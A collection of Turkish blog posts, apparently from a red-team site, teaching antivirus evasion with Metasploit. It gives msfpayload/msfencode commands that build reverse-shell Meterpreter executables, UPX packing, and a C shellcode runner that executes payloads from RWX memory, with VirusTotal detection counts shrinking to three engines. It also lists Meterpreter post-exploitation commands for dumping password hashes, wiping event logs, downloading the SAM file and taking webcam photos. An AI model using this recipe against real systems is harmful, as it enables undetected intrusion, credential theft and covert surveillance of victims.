AV Bypass: MSF Üzerinde Payload Üretilmesi

AV Bypass: MSF Üzerinde Payload Üretilmesi

Antivirüslerin atlatılması için, çok etkin bir yöntem olmasa da Metasploit tarafından sağlanan msfpayload ve msfencode modülleri kullanılabilir. Konu ile ilgili ayrıntılı bilgi için bakınız. Bu yazıda ise msfconsole içerisindeki payload modüllerinden biri kullanılarak benzer işlemler gerçekleştirilecektir.

Yazının devamı için bakınız:
http://www.siberportal.org/red-team/anti-virus-evasion-techniques/evading-anti-virus-detection-using-payload-option-of-msfconsole-interface/

Metasploit Unleashed: Metasploit Fundamentals

Metasploit Unleashed: Metasploit Fundamentals

Metasploit anaçatısını kullanmak için bir çok arayüz bulunmaktadır. Tüm arayüzlerin avantaj ve dezavantajları olmakla birikte; bu arayüzlerden en verimlisi msfconsole denebilir.
MSF, Kali Linux üzerinde "/usr/share/metasploit-framework" altında toplanmıştır.

1) Msfcli

msfconsole ile yapılabilecek işlemleri tek bir satırda / adımda gerçekleştiren arayüzdür. Başlıca kullanım amaçları aşağıdaki gibidir:

• Exploit ve Auxiliary modülleri çalıştırmak
• Tek bir satırda tüm işlemleri gerçekleştirerek öğrenim kolaylığı sağlamak
• Yeni exploit’ler test etmek ve geliştirmek
• İnteraktif erişimin mümkün olmadığı durumlarda kullanmak
• Exploit işlerinde betiklerle otomatik işlemler gerçekleştirmek
• Tek seferlik exploit işlemlerini daha hızlı gerçekleştirmek
• Hangi exploit veya payload kullanılacağı bilindiği durumlarda hız kazanmak

Ancak msfconsole kadar desteklenmediği ve aynı anda sadece tek bir kabuk (shell) açılabildiği için istemci taraflı saldırılarda çok da pratik değildir. Ayrıca msfconsole’un bazı gelişmiş özelliklerini kullanamamaktadır.
Değişken ataması sırasında msfconsole’daki gibi “ ”(boşluk) kullanılması yerine, “=” kullanılır. Ayrıca seçeneklerin büyük/küçük harf duarlı olduğu da göz önünde bulundurulmalıdır.

Önemli parametreleri:

-h veya H: Yardımcı dokümantasyon sunar.
-E: Seçilen modülü çalıştırır.
P: Seçilen modül için uygun Payload değerlerini sunar.
O: Seçilen modül için uygun seçenekleri sunar. Böylece hangi seçeneklerin ayarlanabileceği listelenir.

Örnek kullanımlar:

# msfcli -h
# msfcli exploit/multi/samba/usermap_script O
# msfcli exploit/multi/samba/usermap_script P
# msfcli exploit/windows/smb/psexec RHOST=192.168.2.182 PAYLOAD=windows/meterpreter/reverse_https LHOST=192.168.2.97 LPORT=443 SMBUser=Tubitak SMBPass=Aa123456 E

2) Msfconsole

En çok destek gören ve tercih edilen arayüzdür. Bunun başlıca sebepleri şu şekildedir:

• Kullanıcı dostudur. Ruby sayesinde Tab tuşu ile tamamlama gibi kullanımı kolaylaştırıcı özelliklere sahiptir.
• En sağlam (stable) konsol tabanlı arayüzdür.
• Merkezi bir arayüz sunar.
• Metasploit ana çatısının her özelliğine (feature) neredeyse tamamına erişim sağlayabilen tek MSF arayüzüdür.
• Metasploit anaçatısındaki özelliklerin yanı sıra, Linux taraflı dış komutlara (ifconfig, ping,... gibi) da erişim sağlanabilir.
• Yardımcı dokümanları en iyi hazırlanmış arayüzdür.

Bu arayüzün kullanımı için “/usr/share/metasploit-framework” dizini altındaki msfconsole aracı kullanılır. Eğer çevresel değişkenler uygun şekilde yapılandırılmışsa, Kali'de yapılandırılmıştır, herhangi bir dizinde bu komut çalıştırılabilir.

Önemli parametreleri:

-h veya --help: Yardımcı dokümantasyon sunar.
-r <KaynakDosya>: Belirtilen kaynak / betik dosyasını (resource file) çalıştırır.
-c <YapilandirmaDosyasi>: Belirtilen yapılandırma dosyasını (configuration file) yükler.
-o <CiktiDosyasi>: Belirtilen dosyaya logları yazar.

Bu aracın çalıştırılması ile “msf” adlı konsola düşülür.

msfconsole komutları:

help veya ? veya <Komut> -h: Yardımcı dokümantasyon sunar.
info <ModulAdi>: Seçilen modülü veya modüller ile ilgili ön bilgi (Modül adı, versiyonu, çalışacağı platformlar, lisansı, yazarları, tanımı, seçenekleri, referansları, beklenmedik etkileri vs) sunar.
back: Mevcut modülden geri çıkmak için kullanılır.
check: Exploit işlemini gerçekleştirmeden önce yapılan kontroldür. Böylece exploit işleminin başarılı olup olunmayacağı kontrol edilir. Çok az sayıda exploit tarafından bu komut desteklenir.
connect <Senecekler>: Telnet veya netcat araçları gibi, bir sistemin bir portuna bağlantı (connect <IP> <Port>) için kullanılır.
exit: msfconsole komut satırından çıkılması için kullanılır.
irb: msf konsolundan, etkileşimli Ruby kabuğuna geçiş için kullanılır.
jobs <Secenekler>: Arka planda çalışan modülleri sunar, sonlandırır ve yönetir.
kill <JobId>: Belirtilen arka plandaki işlemi (job) sonlandırır.
load <EklentiAdi>: Kişisel (“/root/.msf4/plugins”) ve Metasploit anaçatısındaki eklentileri (“/usr/share/metasploit-framework/plugins”) yükler.
resource <KaynakDosyasi>: msfconsole tarafından yüklenebilecek betik (kaynak) dosyalarını çalıştırır.
route: Oturum açıldıktan sonra ağlar arasında oturumlar üzerinden geçmek için kullanılır. Ayrıntılı bilgi Pivoting başlığı altında incelenecektir.
search <ModulBilgisininBirKismi>: Adı, tanımı, referansı gibi bilgisinin belli bir kısmı bilinen modül için arama gerçekleştirilir. Modüller isimlendirilirken “-” yerine “_” kullanıldığından, “_” ile arama yapılması daha doğru sonuçlar verir.
sessions: Mevcut oturumları (meterpreter oturumu, shell,  VNC) listeler ve yönetir.
set <Secenek> <Deger>: Mevcut modül için belirtilen seçeneğe, belirtilen değeri atar.
setg <Secenek> <Deger>: Tüm modüller için (global olarak) belirtilen seçeneğe, belirtilen değeri atar.
save: setg komutu ile yapılan değişiklikleri ayar dosyasına (/root/.msf4/config) kaydeder. Böylece bu ayarlar her zaman kullanılabilir.
show <Parametre>: Belirtilen parametreye (all, encoders, nops, exploits, payloads, auxiliary, plugins, options) uygun seçenekleri sunar.
unload <EklentiAdi>: Yüklü eklentiyi kaldırır.
unset <Parametre>: Değer verilmiş seçeneklerdeki değeri kaldırır.
unsetg <Parametre>: Değer verilmiş genel seçeneklerdeki değeri kaldırır.
use <ModulAdi>: Belirtilen modül kullanılır.
run veya exploit: Modülleri çalıştırmak için kullanılır. Auxiliary modüller için “run”, istismar modülleri için “exploit” kullanılır.

Örnek kullanımlar:

msf > help
msf > sessions -h
msf > search smart_hash
msf > search type:post platform:linux path:scade name:mysql author:dookie
msf > use post/windows/gather/smart_hashdump
msf > sessions -l
msf > sessions -i 4 -c “net localgroup”
msf > sessions -k 2
msf > unset all
msf exploit(psexec) > set RHOSTS 192.168.5.0/24
msf > setg RHOSTS 192.168.5.0/24
msf > save
msf exploit(ms08_067_netapi) > show payloads
msf > show options

3) Exploits

Modül seçildikten, modül seçenekleri ayarlandıktan sonra zafiyeti kullanarak hedef sisteme sızmak için kullanılan komuttur.

Önemli parametreleri:

-h: Yardımcı dokümantasyon sunar.
-j: Modül arkaplanda çalıştırılır.
-z: Modül başarılı bir şekilde çalıştırıldıktan sonra oturum ile direk etkileşime girilmez. Örneğin, hedef sistemin kabuğuna düşülmez. “shell -i <OturumNo>” komutu ile hedef kabuğa düşülür.

Exploit işlemi sonucunda hedef sistem ile etkileşime girildiğinde meterpreter kabuğuna düşülür.

Exploit’ler aktifliğine göre 2’ye ayrılır:

• Aktif Exploit’ler: Bir sistemdeki zafiyeti istismar eden ve işi bittikten sonra kapanan (bir hata olmadığı takdirde) sunucu tabanlı (saldırganın bir sisteme saldırdığı) exploit çeşididir.
• Pasif Exploit’ler: Hedef sistemin bağlantı talebini gerçekleştirmesi beklenen istemci tabanlı (web tarayıcısındaki, mail istemcisindeki) exploit çeşididir.

4) Payloads

Payloadlar 3 grupta incelenebilir.

• Single (Inline / Non Staged) : Tek başınlarına çalışan, hem bağlantıyı sağlayan hem de hedef bilgisayarda basit işlemler gerçekleştiren payload’lardır. Stagers ve Stages payload’larının birleşimi olarak düşünülebilir. Örnek: Hedef sisteme kullanıcı ekleme (adduser), hedef sisteme bağlantı kurma (shell_bind_tcp), hedef sistemde kod çalıştırma (exec), hedef sistemde bir prosesi (explorer.exe gibi) öldürme, hedef sistemin kayıt defterinde değişiklik gerçekleştirme, ....
• Stagers: Saldırgan ve hedef bilgisayarlar arasında ağ altyapısını kuran, küçük boyutlu olan ve sağlam olmak zorunda olan payload’lardır. Bağlantı kurulurken küçük boyuttaki kodlar kullanılır, bağlantı kurulduktan sonra büyük boyuttaki kodlar kullanılarak modül ve payload’lar hedef sisteme yollanmaktadır. Metasploit alt yapısı barındırdığı benzer payload’lardan en iyisini kendi içerisinde seçer ve bağlantıyı seçtiği en uygun payload ile kurar. Örnek: bind_tcp, reverse_tcp, bind_http(s), reverse_http(s), ...
• Stages: Stager payload’lar tarafından hedef sisteme yüklenen ve asıl işlemleri gerçekleştiren payload bileşenleridir. Saldırganın hedef bilgisayarda komut çalıştırması veya saldırganın hedef bilgisayardan dosya alması, ... gibi işlemler için kullanılan shell (ipwn, http,…), meterpreter, VNC Injection birer stages payloadlardır. Single payload’lardan daha karmaşık işlemleri gerçekleştirirler.

Payload adına bakılarak payload kategorisi anlaşılabilmektedir. Payload adında “/” yoksa single; varsa ilk değer stage ve ikinci değerse stager bilgisini verir. Örneğin; “windows/shell_bind_tcp” için single payload, “windows/shell/bind_tcp” için stager (bind_tcp) ve stage (shell) içeren bir payload’dur denilebilir.

Payload belirlemek için “set” komutu kulalnılabilir.

Metasploit anaçatısında bulunan en önemli payload türleri aşağıdaki gibidir:

• Inline (Non staged): Belirli işlevi yerine getiren single payload’dur.
• Staged: Belirli bir işlevi yerine getirmek için stage payload’lar ile birlikte çalışan stager payload’lardır.
• Meterpreter (Meta-Interpreter): Hedef sistemin belleğinde çalışan, diskinde iz bırakmayan ve DLL enjeksiyonu yolu ile hedef bilgisayarda betik veya komutların çalışmasını sağlayan oldukça gelişmiş bir payload türüdür.
• PassiveX: IE uygulamasında etkin olarak bırakılmış olan ActiveX kontrollerini kullanarak HTTP üzerinden komut çalıştırmaya yarayan ve firewall gibi ağ cihazlarının atlatılmasında kullanılan payload türüdür.
• NoNX (No eXecute): DEP (Data Execution Prevention - RAM üzerinde gerçekleşen işlemleri kontrol ederek, saldırıları önler) koruma mekanizmasını atlatmak için kullanılan payload türüdür.
• Ord: Her dildeki ve platformdaki Windows işletim sistemlerinde çalışan küçük boyutlu payload türleridir. Ancak exploit işlemi öncesinde prosese ws2_32.dll yüklenmesini beklediği için ve diğer payload türlerine göre daha az sağlam (stable) olduğu için çok de tercih edilmezler.
• IPV6: Ipv6 ağlarında kullanılan payload türleridir.
• Reflective DLL enjeksiyonu: Stage payload’un diskte değil RAM üzerinde işlem gördüğü VNC ve Meterpreter payload’larının da kullandığı tekniktir. Ayrıntılı bilgi için bakınız: http://blog.harmonysecurity.com/2008/10/new-paper-reflective-dll-injection.html

Metaploit ana çatısı, exploit geliştiricilerine daha esnek bir ortam sağlamak için mevcut payload’lar haricinde payload’ların üretilmesine de olanak sunar.  Payload işlemleri msfconsole üzerinde gerçekleştirilir.

msfconsole’da payload işlemleri için kullanılabilecek önemli parametreler:

use <PayloadAdi>: Belirtilen payload’u kullanır.
generate <Secenekler>: Belirtilen payload’u üretir. 

Örnek kullanımlar:

msf > use payload/windows/shell_bind_tcp
msf payload (shell_bind_tcp) > generate -b '\x00\x44\x67\x66\xfa'

"generate" parametreleri:
msfconsolda payload üretimi için “generate” sonrası kullanılabilecek önemli parametreler:

-h: Yardımcı dokümantasyon sunar.
-b <IstenmeyenKarakterler>: Payload içerisinde belirtilen karakteler kullanılmadan payload üretilir. Payload üretimi sırasında payload boyutu artış göstermekte ve otomatik olarak en uygun kodlayı (encoder) ile kod karıştırılmaktadır. Ancak istenmeyen karakter çok fazla ise bir payload üretimi gerçekleşmeyebilir. Bu durum sesli harf kullanmadan cümle oluşturmaya benzetilebilir.
-e <KodlayiciAdi>: Belirli bir kodlayıcı kullanılarak payload üretilir. Farklı bir encoder kullanımında payload boyutu artacaktır.
-f <DosyaAdi>: Payload bir dosyaya kaydedilir.
-i <IterasyonAdedi>: Payload üretimi sırasında shellcode’un kaç iterasyon geçireceğini belirtir. Bu parametre ile payload boyutu artarken, antivirüsler tarafından yakalanması ise daha zor olacaktır. İterasyon adedi arttıkça payload boyutu artacaktır.
-o <Secenek=Deger>: Payload seçeneklerini değiştirerek payload kodunu üretir.
-t <Dil>: Payload kodunu Ruby dili yerine tercih edilen programlama dilinde (raw,ruby,rb,perl,pl,bash,sh,c,js_be,js_le,java,dll,exe,exe-small,elf,macho,vba,vba-exe,vbs,loop-vbs,asp,aspx,war,psh,psh-net) formatlayarak oluşturur.
-s <KarakterAdedi>: Payload başlangıcına belirtilen karakter adedince boş karakter (NOP) ekleyerek payload üretir. Eklenen byte adedince payload boyunu artış gösterir.

Örnek "generate" kullanımları:

• msf  payload(shell_bind_tcp) > generate -h
• msf  payload(shell_bind_tcp) > generate -b '\x00\x44\x67\x66’ -i 3
• msf  payload(shell_bind_tcp) > generate -b '\x00' -e x86/shikata_ga_nai -f /root/msf/filename.txt
• msf  payload(reverse_tcp) > generate -o LPORT=443,EXITFUNC=seh -b '\x00\xff' -e x86/shikata_ga_nai -t java

Bind ve Reverse Bağlantı İlişkisi
Bind ve Reverse bağlantı ile ilgili farkı görmek için aşağıdaki 2 örnek incelenebilir.

Reverse bağlantıda Windows (192.168.2.182) makinenin herhangi bir portundan, Linux makinenin (192.168.2.97) belirtilen portuna (4567) bağlantı kurulur.

# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.97 LPORT=4567 X > /root/Desktop/TersBaglanti.exe
# msfcli exploit/multi/handler PAYLOAD=windows/meterpeter/reverse_tcp LHOST=192.168.2.97 LPORT=4567 E

Sonuç:

[*] Started reverse handler on 192.168.2.97:4567
[*] Starting the payload handler...
[*] Sending stage (769024 bytes) to 192.168.2.182
[*] Meterpreter session 1 opened (192.168.2.97:4567 -> 192.168.2.182:49159) at 2014-03-16 21:38:07 +0200

Bind bağlantıda Linux (192.168.2.97) makinenin herhangi bir portundan daha sonra bağlantı kurmak için, Windows makinenin (192.168.2.182) dinlediği (ve belirtilen) portuna (7654) bağlantı kurulur.

# msfpayload windows/meterpreter/bind_tcp LPORT=7654 X > /root/Desktop/DuzBaglanti.exe
# msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp RHOST=192.168.2.182 LPORT=7654 E

Sonuç:

[*] Started bind handler
[*] Starting the payload handler...
[*] Sending stage (769024 bytes) to 192.168.2.182
[*] Meterpreter session 1 opened (192.168.2.97:56332 -> 192.168.2.182:7654) at 2014-03-16 21:04:33 +0200

5) Veritabanları

Metasploit anaçatısı kullanılarak gerçekleştirilen operasyonlara ait sonuçların takibi amacıyla PostgreSQL veritabanı kullanılabilir. msfconsole’a düşüldüğünde veritabanı bağlantısı otomatik olarak TCP/7337 portunda başlatılmaktadır.

Önemli parametreleri:

workspace <Secenekler>: Gerçekleştriilen operasyonların organizasyonu için kullanılan yapıları yönetir.
hosts <Secenekler>: Mevcut workspace üzerinde bulunan sistemleri listeler ve yönetir. Sistem ekleme (-a / --add) ve silme (-d / --delete),  belirli kolonları gösterme (-c <KolonAdi>), arama gerçekleştirme (-S / --search), modüldeki hedef bilgisayarları veritabanından yükleme (-R) işlemlerini gerçekleştirir.
db_import <DosyaAdi>: Dosyada bulunan tarama sonucunu veritabanına ekler.
db_nmap <Secenekler>: Nmap ile tarama gerçekleştirip çıktısını mevcut workspace içerisine otomatik olarak kaydeder.
db_export –f <Format> <DosyaAdi>: Elde edilen sonuçları belirtilen formatta (xml veya pwdump) ve isimde dosyaya kaydeder.
services <Secenekler>: Servis isimlerine göre filtreleme gerçekleştirilir.
-o <DosyaAdi>: CSV uzantılı olarak sonuçları kaydeder.
creds <Secenekler>: Mevcut workspace üzerinde bulunan sistemlere ait kimlik bilgilerini listeler ve yönetir. Kimlik bilgisi ekleme (-a / --add) ve silme (-d / --delete), bilgileri bir dosyaya yazma (-o <DosyaAdi>), porta (-p <Portlar> / --port <Portlar>) ve servis adına (-s <ServisAdi>) göre kimlik bilgilerini listeleme, eklenecek kimlik bilgisi için tipini (-t <KimlikBilgisiTipi> / --type <KimlikBilgisiTipi>) veya kullanıcı adını (-u <KullaniciAdi> / --user <KullaniciAdi>) veya parolasını (-P <Parola> / --password <Parola>) belirleme, arama gerçekleştirme (-S / --search), modüldeki hedef bilgisayarları veritabanından yükleme (-R) işlemlerini gerçekleştirir.
loot <Secenekler>: Belirli tipteki parola özetlerini listeler.

Örnek kullanımlar:

msf > workspace -a YeniProje
msf > hosts -c address,os_flavor -S "2008 R2"
msf > db_export -f xml /root/msfu/Exported.xml
msf > services -c port,proto,state -p 70-444 -S http -o /root/test2/http.csv
msf > creds -h
msf > creds -a 172.16.194.134 -p 445 -u Administrator -P 7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e:::
msf > loot -t windows.hashes, linux.hashes, linux.passwd, linux.shadow

6) Meterpreter (Meta-Interpreter)

Meterpreter çalışma anında (runtime) DLL enjeksiyonu yolu ile hedef sistemin belleğinde (RAM) işlemler gerçekleştirengelişmiş, dinamik payload türüdür. Hedef sistemde öncelikle bir stager payload (bind, reverse, findtag, passivex gibi) çalışır ve bu payload bir DDL oluşturarak, başka bir DLL’e enjekte olur. Hedef sistemden saldırgandaki Metasploit’e şifreli (TLS/1.0 üzerinden) bir GET mesaj yollar ve hedef bilgisayar bu trafik üzerinden yapılandırılır (stdapi, priv gibi modüller yüklenir vs). Saldırgan ile hedef bilgisayar arasındaki tüm işlemler şifreli trafik (TLS ve TLV protokolleri) üzerinden gerçekleşir.
Meterpreter harddiske herhangi bir şey yazmaz, RAM üzerinde çalışır. Ayrıca yeni bir proses oluşturmadan haklarına göre prosesler arasında sıçrar. Çalışma anında gerekli modüllerin ve eklentilerin yüklenmesine devam edilebilir, yeni özellikler kullanılabilir. Yeni bir modül/uzantı yükleneceği zaman saldırgan bu uzantıyı hedef sisteme gönderir, hedef sistemde bu eklenti DLL’e yüklenir ve başlatılır. Daha sonra eklenti durum bilgisi saldırganın bilgisayarına bildirilir, saldırganın bilgisayarından eklenti fonksiyonları çağırılarak hedef bilgisayarda komutların çalışması sağlanır. Ayrıntılı bilgi için bakınız: http://blog.harmonysecurity.com/2008/10/new-paper-reflective-dll-injection.html

Önemli parametreleri:

-h veya --help: Yardımcı dokümantasyon sunar.
background: Meterpreter oturumundan msf konsola geri dönülür. Meterpreter oturumu kapanmaz, arka plana konur.
clearev: Windows işletim sistemindeki Application, System ve Security loglarını siler.
download <HedefBilgisayardakiDosya> <DosyaninKaydedilecegiKaliUzerindekiDizin>: Hedef bilgisayardan belirli dosya alınır. Windows dizinleri arasında iki tane “\” kullanılmalıdır.
upload <YuklenecekDosyaninKaliUzerindekiYeri> <HedefBilgisayardaDosyaninKaydedilecegiDizin>: Hedef bilgisayardan belirli dosya alınır. Windows dizinleri arasında iki tane “\” kullanılmalıdır.
edit <HedefSistemdekiDosya>: Belirtilen metin dosyasını indirmeye gerek kalmadan açmaya, üzerinde değişiklik yapmaya yarar.
execute <Secenekler>: Hedef sistemde belirli bir komutu çalıştırmak için kullanılır.
getuid: Mevcut prosesi çalıştıran hesabın adını verir.
getpid: Mevcut prosesi ID değerini verir.
hashdump: Yerel kullanıcıların parola özetlerini listeler. Çalışmaması durumunda yapılabilecek işlemler için bakınız: http://ertugrulbasaranoglu.blogspot.com.tr/2013/11/ipucu-hashdump-hatas.html
idletime: Hedef sistemdeki kullanıcının işlem yapmadığı süreyi belirtir.
migrate <ProsesId>: Belirli bir prosese sıçranır. Çalışmaması durumunda “run post/windows/manage/migrate” de denenebilir.
ps: Hedef bilgisayarda çalışan prosesler ve prosesleri çalıştıran hesaplar listelenir.
resource <DosyaAdi>: Dosya içerisinde bulunan komutları çalıştırır.
search -f <DuzenliIfadeOlarakDosyaAdi> <DizinAdi>: Belirli dizinde belirli isimdeki dosyaları arar.
webcam_list: Kameraları listeler.
webcam_snap <Secenekler>: Kamerayı kullanarak fotoğraf çeker.

Örnek kullanımlar:

meterpreter > execute -f cmd.exe -i -H
meterpreter > download C:\\Windows\\System32\\SAM
meterpreter > upload Virus.exe c:\\Users
meterpreter > search -f sea*.bat c:\\xamp\\
meterpreter > webcam_snap -i 1 -v false

Kaynak:
http://www.offensive-security.com/metasploit-unleashed/Metasploit_Fundamentals

AV Bypass: Paketleyiciler (2)

AV Bypass: Paketleyiciler (2)

Bu yazıda dosya sıkıştırma uygulamaları kullanılarak bir ters HTTPS bağlantısı kurularak bağlantı sağlanacaktır.

Metasploit kullanılarak oluşturulan bir payload  aşağıdaki gibi gerçekleştirilebilir:

# msfpayload windows/meterpreter/reverse_https LHOST=192.168.2.48 LPORT=443 > Uygulama1.exe

Metasploit modülleri olan msfpayload ve msfencode ile zararlı uygulama oluşturma işlemleri için bakınız.

Bu uygulama 36 AV tarafından tespit edilmiştir.

Kali üzerindeki UPX adlı sıkılaştırma aracı ile aynı uygulamanın sıkılaştırılmış hali oluşturulabilir:

upx -9qf -oUygulama2.exe Uygulama1.exe

Sıkıştırılmış dosyanın 37 AV tarafından tespit edilmiştir.

Mpress ile sıkıştırma işlemi aşağıdaki gibidir:

Sıkıştırılmış dosyanın 30 AV tarafından tespit edilmiştir.

Not: Çok fazla yaygınlaşmamış paketleyicilerin kullanılması AV'ler tarafından tespit edilme oranını azlacaktır.

Oluşturulan uygulamanın işlevselliğinde bir değişiklik olmamaktadır. Aşağıdaki komutlar sonrasında uygulama çalıştırılınca ters HTTPS bağlantısı kurulmaktatır.

# msfconsole
# msf exploit(handler) > use exploit/multi/handler
# msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
# msf exploit(handler) > set ExitOnSession false
# msf exploit(handler) > set LHOST 192.168.2.48
# msf exploit(handler) > set LPORT 443
# msf exploit(handler) > exploit -j

AV Bypass: Shellcode

AV Bypass: Shellcode

AV gibi sistemleri atlatmak için kullanılan yöntemlerden birisi de Kabuk Kodu (Shellcode) kullanmaktır. Shellcode, exploit sonrası çalışan, payload olarak kullanılan komut kümesidir. Assembly dili ile yazılmıştır. Bu komutlar çalıştıktan sonra, komutun işlevini göre olay gerçekleştirilir. Örneğin, hedef sistemin kabuğuna (shell) düşülür.

Shellcode ile AV atlatma işlemi için 3 adım gerçekleştirilecektir: Öncelikle Shellcode oluşturulacak, bu kod kullanılarak uygulama kodunu hazırlanacak, son olarak da uygulama derlenerek çalıştırılabilir dosya (exe) hazırlanacaktır.

1) Shellcode Hazırlama
Shellcode oluşturmak için kullanılabilecek en kolay yöntem Metasploit içerisindeki msfpayload ve msfencode modüllerini kullanmaktır. Bu modüller ile ilgili aytıntılı bilgi için bakınız.
Bu 2 modül aşağıdaki gibi Shellcode oluşturulabilir.

msfpayload windows/meterpreter/reverse_https LHOST=192.168.2.48 LPORT=443 R | msfencode -b  '\x00\xff' -e x86/shikata_ga_nai -c 3  -t c -o KabukKodu

Not: Senaryonun daha gerçekçi olması amacıyla 443'ten ters HTTPS bağlantısı gerçekleştirilmiştir.

Oluşturulan Shellcode, aşağıdaki gibi "unsigned char" tipinde bir dizi içermektedir:

2) Uygulama kodunu hazırlama
İşlemi gerçekleştirilecek kod hazırlanır. 32 bit mimaride çalışabilen kod C dili ile aşağıdaki kodlarla hazırlanarak *.c uzantılı bir dosyaya yazılabilir.

unsigned char buf[] = " "; // Shellcode yazılır
int main(){
void (*c0d3)();
c0d3 =(void(*)()) buf;
c0d3();            
}

64 bit mimarideki işletim sisteminde çalışması için gerekli koda ise aşağıdaki bağlantıdan erişilebilir.

https://github.com/inquisb/shellcodeexec/blob/master/windows/shellcodeexec/shellcodeexec.c

Ayrıca bakınız:

http://www.securitytube.net/video/6750

Not: Bu kod kullanılırken parametre kullanılmayacağı için "if (argc < 2)" bloğu tamamen veya bu bloğun içerisi yorum satırına alınabilir.

Bu uygulama kodu aşağıdaki gibidir:

Not: Kullanılan kodun son hali, yazının en sonuna eklenmiştir.

3) Uygulama kodunun derlenmesi
Son olarak da bu kod derlenecektir. Sanal makinemiz 64 bit olacağı için 64 bit için hazırlanan uygulama kodu derlenecektir. Ayrıca kodun derlenmesi için Visual Studio'nun "cl" aracı kullanılacaktır.

Öncelikle kod derleme işlemi, Visual Studio kurulum dizininde komut satırı çalıştırılmalıdır. Bunun için, Başlat kısmında Visul Studio Command Prompt, yönetici olarak çalıştırılmalıdır (Eğer uygulama kodu C dizini hariç bir dizinde çalıştırılacaksa yönetici olarak çalıştırmaya gerek yoktur.)

VS komut satırında cl aracı ile hazırlanan kodun (64bit_UygulamaKodu.c) derlenmesi ile uygulama (64bit_UygulamaKodu.exe) oluşmaktadır:

Uygulamanın Taranması
Hazırlanan uygulamanın VirusTotal ile analiz edildiğinde 3 AV tarafından yakalandığı tespit edilmiştir:

VirusTotal kullanımı ile ilgili ayrıntılı bilgi için bakınız.

Uygulamanın Çalıştırılması ve Bağlantının Sağlanması
İstemci tarafından uygulama çalıştırıldığında bağlantının sağlanması için bir dinleyici (listener) açılması gerekir. Bu işlem aşağıdaki gibidir:

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
msf exploit(handler) > set ExitOnSession false
msf exploit(handler) > set LHOST 192.168.2.48
msf exploit(handler) > set LPORT 443
msf exploit(handler) > exploit -j

Uygulama çalıştırıldığında aşağıdaki gibi istemci ile bağlantı sağlanmaktadır.

Sonuç:
Shellcode, AV atlatmak için kullanılabilecek bir yöntemdir. Bazı durumlarda hiçbir AV tarafından yakalamamasına rağmen bazı durumlarda az sayıda da olsa AV tarafında tespit edilebilmektedir.


EK: 64 bit mimaride çalışan uygulama kodu

unsigned char buf[] =
""; // Shellcode eklenmelidir.

#include <sys/types.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <time.h>
#include <ctype.h>

#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
#include <windows.h>
DWORD WINAPI exec_payload(LPVOID lpParameter);
#else
#include <sys/mman.h>
#include <sys/wait.h>
#include <unistd.h>
#endif

int sys_bineval(char *argv);

int main(int argc, char *argv[])
{
if (argc < 2) {
// printf("Run:\n\tshellcodeexec <alphanumeric-encoded shellcode>\n");
// exit(-1);
}

sys_bineval(buf);

exit(0);
}

int sys_bineval(char *argv)
{
size_t len;

#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
int pID;
char *code;
#else
int *addr;
size_t page_size;
pid_t pID;
#endif

len = (size_t)strlen(argv);

#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
// allocate a +rwx memory page
code = (char *) VirtualAlloc(NULL, len+1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

// copy over the shellcode
strncpy(code, argv, len);

// execute it by ASM code defined in exec_payload function
WaitForSingleObject(CreateThread(NULL, 0, exec_payload, code, 0, &pID), INFINITE);
#else
pID = fork();
if(pID<0)
return 1;

if(pID==0)
{
page_size = (size_t)sysconf(_SC_PAGESIZE)-1; // get page size
page_size = (len+page_size) & ~(page_size); // align to page boundary

// mmap an +rwx memory page
addr = mmap(0, page_size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANON, 0, 0);

if (addr == MAP_FAILED)
return 1;

// copy over the shellcode
strncpy((char *)addr, argv, len);

// execute it
((void (*)(void))addr)();
}

if(pID>0)
waitpid(pID, 0, WNOHANG);
#endif

return 0;
}

#if defined(_WIN64)
void __exec_payload(LPVOID);

DWORD WINAPI exec_payload(LPVOID lpParameter)
{
__try
{
__exec_payload(lpParameter);
}
__except(EXCEPTION_EXECUTE_HANDLER)
{
}

return 0;
}
#elif defined(_WIN32) || defined(__WIN32__) || defined(WIN32)
DWORD WINAPI exec_payload(LPVOID lpParameter)
{
__try
{
__asm
{
mov eax, [lpParameter]
call eax
}
}
__except(EXCEPTION_EXECUTE_HANDLER)
{
}

return 0;
}
#endif

AV Bypass: MsfPayload & MsfEncode

AV Bypass: MsfPayload & MsfEncode

Antivirüslerin atlatılması için Metasploit tarafından sağlanan msfpayload ve msfencode modülleri kullanılabilir. Kullanılabilecek en temel yöntemler aşağıdaki gibidir. Her adımda oluşturulan uygulamanın tespit edilmesi VirusTotal ile kontrol edilmiştir. VirusTotal kullanımı ile ilgili ayrıntılı bilgi için bakınız.

1) MsfPayload ile Exe oluşturma
MsfPayload kullanılarak oluşturulabilecek payloadlar aşağıdaki gibi listelenir.

# msfpayload -l

Sadece msfpayload kullanılarak zararlı bir yazılım oluşturmak için X parametresi kullanılabilir. Oluşturulan dosyanın Sha256 özeti de saklanabilir.

# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.8.145 LPORT=4567 X > Uygulama1.exe
# sha256sum Uygulama1.exe

Bu payload ters bir bağlantı oluşturara 192.168.8.145 IP'li bilgisayarın 4567 portuna reverse_tcp bağlantısı oluşturmaktadır. Bu bağlantıyı dinlemek için bir handler açılmalıdır. Handler açılması için gerekli ayarlamaların gerçekleştirilmesi aşağıdaki gibidir:

# msfconsole
# msf > use exploit/multi/handler
# msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
# msf exploit(handler) > set ExitOnSession false
# msf exploit(handler) > set LHOST 192.168.8.145
# msf exploit(handler) > set LPORT 4567
# msf exploit(handler) > show options

Gerekli ayarlamalar yapıldıktan sonra Handler başlatılır.

# msf exploit(handler) > exploit -j

Bir bilgisayarda bu uygulama (Uygulama1.exe) çalıştırıldığında meterpreter bağlantısı oluşacaktır. Bağlantı oluştuktan sonra ilgili oturuma gidilerek meterpreter bağlantısına düşülür ve istenilen komutlar çalıştırılır.

# sessions
# sessions -i 1
# meterpreter > getuid
# meterpreter > getsystem
